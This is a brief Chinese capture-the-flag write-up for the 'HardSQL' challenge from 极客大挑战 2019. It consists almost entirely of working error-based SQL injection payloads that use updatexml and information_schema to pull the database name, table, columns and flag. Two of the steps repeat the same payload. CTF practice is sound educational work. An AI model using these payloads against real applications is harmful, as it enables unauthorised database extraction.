[极客大挑战 2019]HardSQL
Step
尝试
报错注入
- 库名
'or(updatexml(1,concat(0x7e,database()),0x7e))#
- 表名
'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())),0x7e),0))#
- 列名
'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),0))#
- 字段名
'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),0))#
- 字段值
'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))),0x7e),0)#
- 显示不全,继续显示右边的flag
'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1))),0x7e),0)#